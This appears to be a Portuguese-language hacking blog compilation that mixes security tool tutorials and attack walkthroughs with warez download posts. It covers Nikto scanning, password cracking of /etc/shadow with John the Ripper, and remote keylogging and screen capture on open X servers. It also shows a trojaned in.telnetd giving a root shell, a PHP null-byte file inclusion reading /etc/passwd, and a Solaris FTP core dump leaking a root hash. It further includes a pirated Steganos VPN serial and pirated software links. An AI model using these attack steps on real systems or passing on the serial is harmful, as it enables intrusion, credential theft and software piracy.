Obtendo e instalando o Nikto

Não perca tempo procurando um pacote para este programa. A instalação não é complicada, já que o mesmo é apenas um script Perl e dispensa compilação.

Então não se assuste com o tar.gz, pois basta descompactar e sair usando o programa (Lógico se Perl estiver corretamente instalado em seu sistema).

O programa pode ser obtido em modo caractere através do wget. Caso prefira usar a opção gráfica a URL é a mesma.

# wget - c http://www.cirt.net/nikto/nikto-current.tar.gz

Após baixar o tar.gz é preciso descompactar. Será gerado um diretório com o nome nikto-x.zz, onde "x" é a versão e "zz" é o release atuais do programa. Neste exemplo, "nikto-1.35" corresponde a versão mais atual.

# tar -xzpf nikto-current.tar.gz

Atualizando a base de vulnerabilidades e iniciando varredura

Após descompactar o tar.gz, entre no diretório nikto-1.35 e execute a atualização da base de dados. É preciso estar conectado a Internet:

# ./nikto.pl -update

+ Retrieving 'server_msgs.db'
+ Retrieving 'nikto_headers.plugin'
+ Retrieving 'nikto_outdated.plugin'
+ Retrieving 'servers.db'
+ Retrieving 'scan_database.db'
+ Retrieving 'scan_database.db'
+ Retrieving 'nikto_core.plugin'
+ Retrieving 'outdated.db'
+ Retrieving 'CHANGES.txt'
+ www.cirt.net message: Version 2.0 is still coming... Seriously.

Iniciando a varredura das vulnerabilidades

Nikto é para ser usado em ambientes de teste ou mesmo em pequenas redes internas.

Exemplo de relatório de varredura do Apache do servidor Fedora Core 3:

# ./nikto.pl -h 192.168.131.1 -o /root/nikto-1.35/192.168.131.1-e0.txt

-***** SSL support not available (see docs for SSL install instructions) *****
---------------------------------------------------------------------------
- Nikto 1.35/1.36     -     www.cirt.net
+ Target IP:       192.168.131.1
+ Target Hostname: 192.168.131.1
+ Target Port:     80
+ Start Time:      Tue Jun  6 21:10:44 2006
---------------------------------------------------------------------------
- Scan is dependent on "Server" string which can be faked, use -g to override
+ Server: Apache/2.0.52 (Fedora)
+ Allowed HTTP Methods: GET,HEAD,POST,OPTIONS,TRACE
+ HTTP method 'TRACE' is typically only used for debugging. It should be
disabled. OSVDB-877.
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.0.55).
Apache 1.3.33 is still maintained and considered secure.
+ /cgi-bin/.htaccess - Contains authorization information (GET)
+ /icons/ - Directory indexing is enabled, it should only be enabled for
specific directories (if required). If indexing is not used, the /icons
directory should be removed. (GET)
+ /index.html.var - Apache default foreign language file found. All default
files should be removed from the web server as they may give an attacker
additional system information. (GET)
+ /manual/images/ - Apache 2.0 directory indexing is enabled, it should only
be enabled for specific directories (if required). Apache's manual should
be removed and directory indexing disabled. (GET)
+ /cgi-bin/.htaccess.old - Backup/Old copy of .htaccess - Contains
authorization information (GET)
+ /cgi-bin/.htaccess.save - Backup/Old copy of .htaccess - Contains
authorization information (GET)
+ /cgi-bin/.htaccess - Contains authorization information (GET)
+ /cgi-bin/.htaccess~ - Backup/Old copy of .htaccess - Contains authorization
information (GET)
+ /cgi-bin/.htpasswd - Contains authorization information (GET)
+ /.htaccess - Contains authorization information (GET)
+ /.htpasswd - Contains authorization information (GET)
+ / - TRACE option appears to allow XSS or credential theft. See
http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf
for details (TRACE)
+ /manual/ - Web server manual? tsk tsk. (GET)
+ /webmail/ - Redirects to src/login.php , Web based mail package installed.
+ The IBM Web Traffic Express Caching Proxy is vulnerable to Cross Site
Scripting (XSS). CA-2000-02. (GET)
+ /webmail/src/read_body.php - This might be interesting... has been seen in
web logs from an unknown scanner. (GET)
+ 2670 items checked - 15 item(s) found on remote host(s)
+ End Time:        Tue Jun  6 21:10:50 2006 (6 seconds)

Cya !

John The Ripper

Este é um dos mais famosos softwares de quebra de
senhas. Ele possui a possibilidade de decodificar senhas
tanto de ambientes Linux, como de ambientes Microsoft.
Trata-se de uma das ferramentas mais utilizadas pelos hackers.
Sua versão em UNIX é capaz de quebrar os arquivos de senha
dos Windows NT.

Foi projetado para ser rápido e poderoso:
● Decifra algoritmos MD5, Blowfish e DES padrão e de
tamanho duplo;
● Usa seus próprios módulos internos e altamente otimizados
em vez do padrão crypt(3);
● Você pode suspender e reiniciar uma sessão de bruteforce

Pacote: john-X.Y.tar.gz
Descompacte o arquivo:

# tar xvzf johnX.Y.tar.gz

Será criado um novo diretório com o nome do pacote.
OBS: no lugar de X e Y substitua pela versão que você
possui.

Vá para o novo diretório, entre no diretório src e gere
(make) o programa:

# cd johnX.Y
# cd src

Para rodar o make, você deverá escolher para que Sistema
Operacional você usará o John.
Exemplo para Linux:

# make linux-x86-any-elf

O procedimento anterior criará o binário chamado
run/john. O diretório run pode ser copiado em qualquer local, já
que contém todos os arquivos de que John precisa para ser
executado.
Execute o john passando para ele um arquivo de senhas na
linha do comando; geralmente é usada uma cópia de
/etc/passwd ou /etc/shadow.

# john passwd.txt

As senhas decifradas serão exibidas no terminal e também
serão salvas no arquivo run/john.pot.

Quando o john for executado novamente, ele pesquisará
no arquivo john.pot e, se uma senha decifrada for encontrada,
ele não tentará decifrá-la de novo.
Pressionar suspenderá o john. Pressionar
duas vezes abortará o programa sem salvar.
Além disso, o john salvará seu status atual a cada 10
minutos em um arquivo chamado run/john.ini; assim, se o
sistema for interrompido no meio de uma execução, o john
poderá ser reiniciado.

Há várias maneiras de executar o john. Iremos mostar
algumas, mas para saber mais maneiras, consulte o arquivo
doc/EXAMPLES da distribuição do John.
Para reiniciar uma sessão interrompida:

# john restore

Para recuperar as senhas decifradas:

# john show passwd.txt

Para recuperar uma senha decifrada de um usuário específico:

# john show users:hacker passwd.txt

Steganos VPN

Download


Serial: D576-65A0-A55B-8928-D667-5868-47EA-766C

Viole Servidores X mal configurados

Considere um usuário em 10.0.0.1 que utiliza xhost para permitir conexões de 192.168.1.3:

# xhost +192.168.1.3
192.168.1.3 being added to access control list

Agora qualquer usuário com uma conta em 192.168.1.3 pode carregar e exibir um programa X no servidor X em execução 10.0.0.1, contudo o comando a seguir ferá com que um servidor X permita que qualquer host se conecte a ele:

# xhost +
access control disabled, clients can connect from any host.

Considere um usuário malicioso em 192.168.1.3 emitindo o seguinte comando:

# xwd -display 10.0.0.1:0 -root > screenshot.xwd

Esse comando criará um arquivo de imagem chamado screenshot.xwd que conterá uma captura de tela da sessão X do usuário em 10.0.0.1.
O comando xwud pode ser utilizado para visualizar o arquivo screenshot.xwd.

# xwud -in screenshot.xwd

Agora o comando xscan pode ser utilizado para registrar em log os pressionamentos de tecla de um host remoto que emitiu o comando xhost:

# xscan 10.0.0.1
Scanning hostname 10.0.0.1 ...
Connecting to 10.0.0.1 (10.0.0.1) on port 6000...
Connected.
Host 10.0.0.1 is running x.
Starting keybord logging of host 10.0.0.1 to file
KEULOG10.0.0.1:0.0 ....

Esse comando xscan fará com que todas as teclas pressionadas pelo usuário em 10.0.0.1 sejam registradas em log do arquivo KEYLOG10.0.0.1:0:0

Você pode obter xscan em http://packetstormsecurity.org

Descubra arquivos legíveis e graváveis por todo mundo

Além de pesquisar arquivos legíveis pelo grupo, também é possível pesquisar arquivos legíveis por todo mundo aos quais um usuáeio pode ter acesso.
Por exemplo, eis como você pesquisaria todos os arquivos legíveis por todo mundo presentes no diretório /etc:

#find /etc -type f -perm -4 -print 2> /dev/null

Muitos arquivos em /etc não devem tornar-se legíveis a todo mundo.
Por exemplo o arquivo /etc/shadow contém senhas criptografadas dos usuários. Qualquer pesssoa com acesso a esse arquivo pode quebrar senhas do usuário com um ataque de força bruta utilizando ferramentas como John The Ripper.
Um invasor pode tentar pesquisar arquivos graváveis por todo mundo emitindo o seguinte comando.

#find / -type f -perm -2 -print 2> /dev/null

/usr/sbin/in.telnetd

Nesse exemplo, a conta "joe" do invasor tem permissões de gravação em in.telnetd. O serviço intetd ou xinetd no host vítima invocará o arquivo in.telnetd todas as vezes que uma conexão entrate de telnet for feita para o host. O invasor pode editar o arquivo in.telnetd e inserir o seguinte conteúdo nele:

#!/bin/bash
xterm -display :0.0 &

Agora o invasor pode executar o seguinte em seu host:

xhost +

Isso fornece á vítima permissão de máquina para exibir um programa X no servidor X do invasor. Agora, tudo o que o invasor precisa fazer é efetuar login por telnet do host vítima , o que fará com que inetd ou xinetd invoque /usr/sbin/in.telnetd com privilégio de root,fazendo com que um xterm de root proveniente do host vítima seja apresentado ao invasor.

Exemplos de Inclusão Local no PHP e como prevenir

Pelo exemplo a seguir podemos ver uma inclusão local de arquivos.

$var=$_GET['var'];

include "/home/pages/" . $var . ".php";

?>

Podemos ver que o programador colocou uma "proteção" para abrir apenas arquivos .php, mas como o include não foi declarado de forma correta um usuário malicioso pode inserir um arquivo arbitrário como /etc/passwd.
Um método para a exploração da falha seria algo como por example http://site.com/page.php?var=../../../../etc/passwd
Isto não irá funcionar pois o programador colocou uma "proteção" para abrir apenas arquivos ".php"
Enão para o php o resultado seria algo como

include "/home/pages/../../../../etc/passwd.php"
[...]
?>
E o ataque não seria bem sucedido.
Mas este tipo de proteção é falha, pois permite a inserção de um caractere NULL no final da string.
A nova string ficaria assim ttp://site.com/page.php?var=../../../../etc/passwd

E para o php:

include "/home/pages/../../../../etc/passwd.php"

?>

Como tem este caractere NULL o php ignora a verificação da extensão "php" e o usuário malicioso consegue ler o arquivo /etc/passwd normalmente.

Se colocarmos no php.ini o register_globals para off e magic quotes para on este tipo de erro não acontece ou podemos criar um arquivo .htaccess para forçar o register_globals e magic quotes.
Exemplo do .htaccess:

# php
php_value "register_globals" "off"
php_value "magic_quotes_gpc" "on"
php_value "magic_quotes_runtime" "on"
php_value "display_errors" "off"

Apenas configurar o php.ini de forma correta é um "falso senso de segurança", então vamos arrumar o código para que não acontece o erro.
No exemplo a seguir o código está corrigido e filtrando os dados incluídos.

$var=$_GET['var'];

if(!ereg('^[ a-zA-Z0-9]{1,50}$',$var))$var="error";

include "/home/pages/" . $var . ".php";
?>

Windows XP Service Pack 3 PT/BR OFICIAL

Finalmente a Microsoft disponibilizou o Windows XP SP3 final em português.

O que meu sistema precisa para instalar o SP3?

A Microsoft afirma que usuários com o Windows XP com o Service Pack 1 no PC conseguem instalar a nova atualização, embora aconselhe usuários a procurar o Service Pack 2 antes de procurar pelo mais recente pacote.

Quais as principais novidades do SP3?
No quesito novidades, é possível considerar o Service Pack 2, de 2004, como a última grande atualização do Windows XP.

O SP3 entre outras novidades traz:

* Suporte para o WPA2, serviço de segurança para redes wireless derivada do padrão IEEE 802.11i.
* Network Access Protection (NAP), plataforma de gestão de regras existente no Windows Vista, Windows Server 2008 e Windows XP SP3, protege os elementos de uma rede padronizando medidas de comportamento em função do sistema.
* Peer Name Resolution Protocol (PNRP), permite cooperação entre os padrões do Windows XP com os do Windows Vista, as aplicações que utilizam PNRP passam a ser compatíveis.
* Mais e melhor segurança, foram adicionados comportamento já experimentados com sucesso na Firewall do Vista
* Aumento de velocidade, o desempenho melhora com a instalação do SP3.

Windows XP SP3 Final PT-BR [302.28MB]

Windows XP SP3 Final ENG [316.84MB]

Pacote tudo em um, com apostilas hackers.Neste pacote você encontra:
- The Hacker´s Survival Guide
- Hacking for Dummies 2
- Hacking into Computer Systems for Beginners
- How to Make KeyGens
- Maximum Security
- A Guide to Protecting Your Internet
- Wireless Hacking
- The Invisible Network



Infomações:

Nº de páginas:280
Tamanho:3.14 MB
Formato:Rar
Idioma:Inglês

Download

Vulnerabilidade do Solaris FTP Core Dump da recuperação do arquivo Shadow

O servidor FTP distribuido nas versões mais antigas do Solaris era conhcido por colocar partes do /etc/shadow
no seu arquivo core quando forçado a travar utilizando o seguinte comando:

CMD ~

Depois de travar o processor do servidor FTP utilizando esse comando, o invasor pode obter o arquivo core que sofreu dump a fim de obter partes do arquivo /etc/shadow. Eis uma sessão de exemplo que tenta fazer isso:

$ telnet 127.0.0.1 21

Trying 127.0.0.1 . . .
Connected to 127.0.0.1.
Escape character is '^]'.
220 127.0.0.1 FTO Server (SunOS 5.6) ready
user joe << INVENTADO
331 Password required for joe
pass wrongpassword << INVENTADO
530 Login incorrect.
CMD ~
530 Please Login with USER and PASS.
Connection closed by foreign host.
$ string /core | grep root
root:1$PykbWI8k$bcKLz7CBPbsPHxUcHLnoql:12141:0:99999:7:::

Depois que um invasor tem acesso ao hash de senha do usuário root, ele pode utilizar um ferramentada como John the ripper para quebrar a senha com um ataque de força bruta.

Descubra Arquivos Possuídos Por Um Grupo

Suponha que um invasor obteve acesso à conta local "joe". Ele pode descobrir todos os grupos aos quais "joe" pertence emitindo o comando id:

$id
uid=500(joe) gid=500(joe) groups=500(joe), 501(proj1)

Depois de perceber que "joe" pertence ao grupo "proj1" o invasor pode emitir o seguinte comando, que listará todos os arquivos possuídos pelo grupo "proj1":

$find / - group proj1 - print 2> /dev/null
/var/proj1/main.c
/var/proj1/main.o
/var/proj1/README
/var/proj1/passw.txt
var/log/proj1

Agora o invasor sabe exatamente a quais o arquivos "proj1" "joe" tem acesso. Um desses arquivos, passw.txt pode parecer bem interessante:

$ more /var/proj1/passw.txt
Nota that this program authenticates to the MySQL database
with the system password "r00t3pa55w"

Frequentemente os admins reutilizam senhas. Se a senha do root dos host vítima for a mesma senha do MySQL mostrada na nota anterior, o invasor pode então obter privilégios de root emitindo o comando su;

$ su -
password: r00t3pa55w
# id
uid=0(root) gid=0(root) groups=0(root), 1(bin) , 2(daemon), 3(sys), 4(adm), 6(disk),10 (wheel).

^^

Avast! 4.7 Server Edition for Windows 2000/2003

Avast! 4.7 Server Edition para Windows 2000/2003 oferece a mais avançada e poderosa proteção para combater os vírus em seu(s) servidor(es).

Trabalha com dupla proteção primária para servidor de arquivos, e com alguns plugins adicionais, pode proteger vários subsistemas de servidores, e pode funcionar como um Firewall/Proxy eletrônico. Os plugins incluidos que estão disponíveis para aumentar ainda mais a proteção no seu servidor:
- MS Exchange Server 2000/2003
- MS Proxy/ISA Server
- SMTP Server
- MS SharePoint Server 2001/2003

Pode proteger FTPs e vários outros tipos de protocolo de compartilhamento entre computadores e redes interligadas.

• Tamanho: 29 MB
• Idioma: Inglês
• Outros Antivírus
  
• Sistema: Windows Server 2000/2003
• Hospedagem: Rapidshare

Download